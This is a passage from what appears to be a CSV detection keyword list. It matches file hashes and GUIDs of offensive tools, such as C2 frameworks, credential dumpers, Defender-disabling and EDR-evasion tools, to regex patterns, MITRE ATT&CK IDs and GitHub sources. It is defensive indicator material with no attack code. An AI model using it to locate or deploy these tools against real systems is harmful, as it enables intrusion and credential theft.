T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*F1DF1D0F-FF86-4106-97A8-F95AAF525C54*",".{0,1000}F1DF1D0F\-FF86\-4106\-97A8\-F95AAF525C54.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*F1E836C1-2279-49B3-84CC-ED8B048FCC44*",".{0,1000}F1E836C1\-2279\-49B3\-84CC\-ED8B048FCC44.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*f1zm0/acheron*",".{0,1000}f1zm0\/acheron.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*f1zm0/hades*",".{0,1000}f1zm0\/hades.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee*",".{0,1000}f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0*",".{0,1000}f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F233D36D-B64A-4F14-A9F9-B8557C2D4F5D*",".{0,1000}F233D36D\-B64A\-4F14\-A9F9\-B8557C2D4F5D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d*",".{0,1000}f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*F2378C48-D441-49E7-B094-1E8642A7E7C0*",".{0,1000}F2378C48\-D441\-49E7\-B094\-1E8642A7E7C0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f27479a8728d9126cc055daeb5cddd01cabfa37d*",".{0,1000}f27479a8728d9126cc055daeb5cddd01cabfa37d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579*",".{0,1000}f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2a64b4fce0d07eafded5c2125d7d80b*",".{0,1000}f2a64b4fce0d07eafded5c2125d7d80b.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d*",".{0,1000}f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc*",".{0,1000}f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a*",".{0,1000}f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5*",".{0,1000}f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e*",".{0,1000}f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb*",".{0,1000}f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be*",".{0,1000}f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1*",".{0,1000}f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97*",".{0,1000}f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef*",".{0,1000}f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*F3C62326-E221-4481-AC57-EF7F76AAF27B*",".{0,1000}F3C62326\-E221\-4481\-AC57\-EF7F76AAF27B.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd*",".{0,1000}f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88*",".{0,1000}f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f4081a8e30f75d46.js*",".{0,1000}f4081a8e30f75d46\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588*",".{0,1000}f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b*",".{0,1000}f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7*",".{0,1000}f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b*",".{0,1000}f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46*",".{0,1000}f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6*",".{0,1000}f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e*",".{0,1000}f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290*",".{0,1000}f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9*",".{0,1000}f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d*",".{0,1000}f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b*",".{0,1000}f5028addc30229d68561491b4609ddfe0b908547cf31af3b810177d14c95645b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4*",".{0,1000}f504340404e40fea29f2beb71c114ce3d310ca80631aff7c0f0c19198da897d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21*",".{0,1000}f56888799e7efbcf2196e8f9dfa0d1adc97772ad6fee946cc59307d758a99e21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083*",".{0,1000}f56f11c598a47a0313a3f4e0929a45a6ed7529119189d7434fbe39721e190083.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a*",".{0,1000}f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086*",".{0,1000}f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32*",".{0,1000}f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529*",".{0,1000}f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*f59e403b62053c785de7df979c5cb7b0f426cbeb*",".{0,1000}f59e403b62053c785de7df979c5cb7b0f426cbeb.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*",".{0,1000}f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" 